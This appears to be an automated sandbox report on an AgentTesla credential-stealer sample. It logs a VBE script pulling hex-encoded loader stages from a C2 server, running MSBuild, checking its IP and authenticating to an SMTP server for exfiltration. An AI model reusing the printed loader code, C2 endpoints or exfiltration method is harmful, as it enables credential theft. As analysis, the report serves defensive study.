                                                    HTTP Request Dependency Graph

                                                    • api.ipify.org
                                                    • 144.91.79.54

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549706144.91.79.54805548C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 15, 2025 21:27:24.128643036 CET152OUTGET /2412/s HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: 144.91.79.54
                                                    Jan 15, 2025 21:27:24.750247002 CET1236INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:24 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                                    ETag: "6ab0-6237452d358f3"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 27312
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                                                    Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                    Jan 15, 2025 21:27:24.750298023 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                                    Jan 15, 2025 21:27:24.750334978 CET1236INData Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                                    Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                                    Jan 15, 2025 21:27:24.750368118 CET1236INData Raw: 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35 39 34 31 33 34 34 37 34 31 36 43 34 32 34 31 36 32 34 31 36 42 34 37 34 31 34 37 34 32 34 31 36 32 34 31 34 35 34 37 34 31 37 35 34 32 35 31 36 31 34 31 36 33 34 37 34 31 37 30 34 32 36 37 36
                                                    Data Ascii: 1414155474174425159413447416C424162416B474147424162414547417542516141634741704267634138454142416745417745414141414141414141414177634173474179425159413047416C42415A4145474179424156417747416842775A415547414D4251414145414171414141415144417941414D
                                                    Jan 15, 2025 21:27:24.750401974 CET1236INData Raw: 35 34 31 34 43 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 35 34 32 37 37 36 32 34 31 36 42 34 37 34 31 33 30 34 32 35 31 35 39 34 31 37 37 34 37 34 31 37 41 34 32 36 37 36 32 34 31 34 35 34 37 34 31 37 39 34 32 34 31 35 36 34 31 34
                                                    Data Ascii: 5414C41414141414141414175427762416B474130425159417747417A4267624145474179424156414141414541414A4141414141417762415947417542515341554741734251614159454179425159415946414241414141514541414141414141414141414141414141414141514141414141454141414141
                                                    Jan 15, 2025 21:27:24.750435114 CET1120INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 33 39 33 38 34 38 34 31 36 39 35 32 34 37 36 33 37 35 35 31 36 41 34 44 37 37 34 39 34 34 34 44 37 38 34 39 34 34 34 44 36 42 37 38 35 37 36 31 33 31 34 41 34 35 35 38 36 45 35 36 36 45 35
                                                    Data Ascii: 1414141414141414141393848416952476375516A4D7749444D7849444D6B785761314A45586E566E596C524558714A326263526A4D7749444D7849444D6B785761314A45583049444D7941544D7941445A736C576443784663765233617A5647526335576174525759634E6E636C4E585663707A5141414141
                                                    Jan 15, 2025 21:27:24.750468969 CET1236INData Raw: 31 34 31 35 34 34 31 34 31 34 31 37 39 35 36 34 37 36 34 33 31 34 32 35 38 36 32 37 36 34 45 36 42 34 43 33 35 33 31 33 30 34 33 34 31 34 35 34 31 34 35 34 31 34 31 34 31 34 31 36 36 33 39 35 36 35 41 36 41 33 35 35 37 35 39 33 30 34 45 36 45 36
                                                    Data Ascii: 141544141417956476431425862764E6B4C3531304341454145414141416639565A6A355759304E6E624A3931586C4E3362774E5861454E785866563259754647647A3557536639565A3046575A794E6B4573393259765233627942466475565761734E45633052485377463262543579637339325976523362
                                                    Jan 15, 2025 21:27:24.750502110 CET1236INData Raw: 33 34 34 34 33 36 34 36 46 36 34 35 37 36 31 37 39 36 43 34 38 36 33 37 36 34 45 36 42 34 35 34 31 34 35 37 37 34 36 34 31 34 31 34 31 34 31 34 31 34 35 35 31 34 32 34 31 34 31 34 31 34 45 37 39 34 31 36 41 34 44 37 37 34 35 36 41 34 44 37 37 35
                                                    Data Ascii: 34443646F645761796C4863764E6B454145774641414141414551424141414E79416A4D77456A4D7751476270566E514E4151415341414141415141484151414945776333396D636F526C62766C47647756325934566B6276354563684A33565749415641454141423442414141414141674141426741415441
                                                    Jan 15, 2025 21:27:24.750535965 CET1236INData Raw: 37 34 33 34 39 33 34 35 31 34 32 34 33 34 31 35 31 34 32 34 39 36 37 36 37 34 34 34 33 34 31 35 33 34 32 34 39 34 31 34 31 34 39 34 34 36 37 34 31 34 33 34 36 33 30 35 32 34 32 36 34 35 31 37 37 34 32 34 39 36 37 36 38 34 35 34 32 36 33 34 31 34
                                                    Data Ascii: 7434934514243415142496767444341534249414149446741434630524264517742496768454263414264436F4564436F454241414342436F45426351425A436F454F4567416763516D414B42416755516C4147526153454141487742484349414146306E4543306E45446377426B4952414851515953457742
                                                    Jan 15, 2025 21:27:24.750570059 CET1236INData Raw: 31 35 35 34 37 34 31 35 33 34 32 36 37 34 43 34 31 34 39 33 32 34 36 34 31 34 31 35 31 36 35 33 30 34 41 35 38 35 41 37 37 33 39 36 44 36 33 35 31 34 45 33 33 35 41 37 35 36 43 34 37 36 34 33 30 35 36 33 32 35 35 33 35 33 31 34 35 34 31 33 35 34
                                                    Data Ascii: 15547415342674C4149324641415165304A585A77396D63514E335A756C47643056325535314541354A48647A6C325A6C4A464135786D59745632637A4630583056325A416B585A4C6C6E63304E58616E566D55416B585A4C4A57645435575A7739454135316B4C69424165764A305A7A314541304A585A3235
                                                    Jan 15, 2025 21:27:24.755580902 CET1236INData Raw: 37 36 31 34 45 34 32 37 37 36 33 36 43 34 45 35 37 36 31 33 32 34 41 35 38 35 41 35 34 34 41 35 37 35 41 35 38 36 43 35 38 35 34 34 31 34 44 35 38 35 41 36 41 36 43 36 44 36 34 37 39 35 36 33 32 35 35 36 39 35 36 33 32 35 36 36 36 35 32 35 38 35
                                                    Data Ascii: 7614E4277636C4E5761324A585A544A575A586C5854414D585A6A6C6D6479563255695632566652585A6E4277636C4E576132564752754D57617A466D51734657647A6C6D5675516E5A764E3362794E57614E4277636A6C47647A396D626E465761453553626C523363354E46417956585A73466D5674396D62
                                                    Jan 15, 2025 21:27:24.924185991 CET152OUTGET /2412/v HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: 144.91.79.54
                                                    Jan 15, 2025 21:27:25.112163067 CET761INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:25 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                    ETag: "1de-622f3802a248c"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 478
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                                    Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                                    Jan 15, 2025 21:27:25.117398024 CET152OUTGET /2412/r HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: 144.91.79.54
                                                    Jan 15, 2025 21:27:25.301640034 CET1236INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:25 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                    ETag: "9800-62404d5968a93"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 38912
                                                    Keep-Alive: timeout=5, max=98
                                                    Connection: Keep-Alive
                                                    Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                    Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                    Jan 15, 2025 21:27:25.386248112 CET153OUTGET /2412/cn HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: 144.91.79.54
                                                    Jan 15, 2025 21:27:25.569441080 CET347INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:25 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Sat, 09 Nov 2024 16:14:35 GMT
                                                    ETag: "42-6267d29e174cb"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 66
                                                    Keep-Alive: timeout=5, max=97
                                                    Connection: Keep-Alive
                                                    Data Raw: 35 33 37 34 36 46 37 30 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 44 34 45 36 31 36 44 36 35 32 30 36 33 36 46 36 45 36 38 36 46 37 33 37 34 32 30 32 44 34 36 36 46 37 32 36 33 36 35
                                                    Data Ascii: 53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365
                                                    Jan 15, 2025 21:27:25.600626945 CET155OUTGET /2412/file HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: 144.91.79.54
                                                    Jan 15, 2025 21:27:25.784152031 CET1236INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:25 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Fri, 10 Jan 2025 19:46:38 GMT
                                                    ETag: "165a-62b5f5a682598"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 5722
                                                    Keep-Alive: timeout=5, max=96
                                                    Connection: Keep-Alive
                                                    Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 36 32 37 32 36 35 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 43 32 30 34 34 36 46 37 33 37 33 36 39 36 35 37 32 35 37 36 39 36 45 36 34 36 46 37 37 37 33 32 43 32 30 34 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 37 33 30 41 35 33 36 35 37 34 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 34 34 36 46 37 33 37 33 36 39 36 35 [TRUNCATED]
                                                    Data Ascii: 4F7074696F6E204578706C696369740A0A27204E6F6D6272652064752070726F6A65743A207C706174687C0A27205661726961626C657320676C6F62616C65730A44696D205368656C6C4F626A65742C20446F737369657257696E646F77732C20436F6D7074657572497465726174696F6E730A536574205368656C6C4F626A6574203D204372656174654F626A6563742822575363726970742E5368656C6C22290A446F737369657257696E646F7773203D205368656C6C4F626A65742E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A272050726F6772616D6D65207072696E636970616C0A43616C6C20496E697469616C69736174696F6E28290A43616C6C20457865637574696F6E5072696E636970616C6528290A0A2720496E697469616C69736174696F6E2064657320706172616D65747265732064752070726F6772616D6D650A53756220496E697469616C69736174696F6E28290A20202020436F6D7074657572497465726174696F6E73203D20300A456E64205375620A0A2720526F7574696E65207072696E636970616C6520706F7572206765726572206C27657865637574696F6E2064752070726F6772616D6D650A53756220457865637574696F6E50726
                                                    Jan 15, 2025 21:27:25.820831060 CET175OUTGET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: 144.91.79.54
                                                    Jan 15, 2025 21:27:26.016869068 CET1236INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:25 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                    Last-Modified: Tue, 14 Jan 2025 02:32:27 GMT
                                                    ETag: "75400-62ba15f35a05a"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 480256
                                                    Keep-Alive: timeout=5, max=95
                                                    Connection: Keep-Alive
                                                    Content-Type: text/plain
                                                    Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                    Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549707172.67.74.152443380C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 20:27:33 UTC155OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                    Host: api.ipify.org
                                                    Connection: Keep-Alive
                                                    2025-01-15 20:27:33 UTC424INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 20:27:33 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 12
                                                    Connection: close
                                                    Vary: Origin
                                                    CF-Cache-Status: DYNAMIC
                                                    Server: cloudflare
                                                    CF-RAY: 90289b70bb5443ab-EWR
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1784&rtt_var=727&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1636771&cwnd=224&unsent_bytes=0&cid=fd88416f486f0624&ts=370&x=0"
                                                    2025-01-15 20:27:33 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                    Data Ascii: 8.46.123.189


                                                    SMTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Jan 15, 2025 21:27:35.553765059 CET58749709162.254.34.31192.168.2.5220 server1.educt.shop ESMTP Postfix
                                                    Jan 15, 2025 21:27:35.561285019 CET49709587192.168.2.5162.254.34.31EHLO 936905
                                                    Jan 15, 2025 21:27:35.733308077 CET58749709162.254.34.31192.168.2.5250-server1.educt.shop
                                                    250-PIPELINING
                                                    250-SIZE 204800000
                                                    250-ETRN
                                                    250-STARTTLS
                                                    250-AUTH PLAIN LOGIN
                                                    250-AUTH=PLAIN LOGIN
                                                    250-ENHANCEDSTATUSCODES
                                                    250-8BITMIME
                                                    250-DSN
                                                    250 CHUNKING
                                                    Jan 15, 2025 21:27:35.734217882 CET49709587192.168.2.5162.254.34.31AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
                                                    Jan 15, 2025 21:27:35.904500008 CET58749709162.254.34.31192.168.2.5334 UGFzc3dvcmQ6
                                                    Jan 15, 2025 21:27:36.083173990 CET58749709162.254.34.31192.168.2.5235 2.7.0 Authentication successful
                                                    Jan 15, 2025 21:27:36.083385944 CET49709587192.168.2.5162.254.34.31MAIL FROM:<sendxsenses@vetrys.shop>
                                                    Jan 15, 2025 21:27:36.282025099 CET58749709162.254.34.31192.168.2.5250 2.1.0 Ok
                                                    Jan 15, 2025 21:27:36.282362938 CET49709587192.168.2.5162.254.34.31RCPT TO:<senses@vetrys.shop>
                                                    Jan 15, 2025 21:27:36.468002081 CET58749709162.254.34.31192.168.2.5250 2.1.5 Ok
                                                    Jan 15, 2025 21:27:36.468200922 CET49709587192.168.2.5162.254.34.31DATA
                                                    Jan 15, 2025 21:27:36.637281895 CET58749709162.254.34.31192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                    Jan 15, 2025 21:27:36.637921095 CET49709587192.168.2.5162.254.34.31.
                                                    Jan 15, 2025 21:27:36.923307896 CET58749709162.254.34.31192.168.2.5250 2.0.0 Ok: queued as 5E41F6087D
                                                    Jan 15, 2025 21:29:14.787906885 CET49709587192.168.2.5162.254.34.31QUIT
                                                    Jan 15, 2025 21:29:15.100421906 CET58749709162.254.34.31192.168.2.5221 2.0.0 Bye

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:15:27:22
                                                    Start date:15/01/2025
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe"
                                                    Imagebase:0x7ff66c420000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:15:27:24
                                                    Start date:15/01/2025
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                                                    Imagebase:0x7ff66c420000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:3
                                                    Start time:15:27:25
                                                    Start date:15/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:15:27:25
                                                    Start date:15/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:15:27:30
                                                    Start date:15/01/2025
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    Imagebase:0x240000
                                                    File size:262'432 bytes
                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3346351856.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3346351856.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3346351856.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3346351856.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:15:27:32
                                                    Start date:15/01/2025
                                                    Path:C:\Windows\System32\wermgr.exe
                                                    Wow64 process (32bit):false
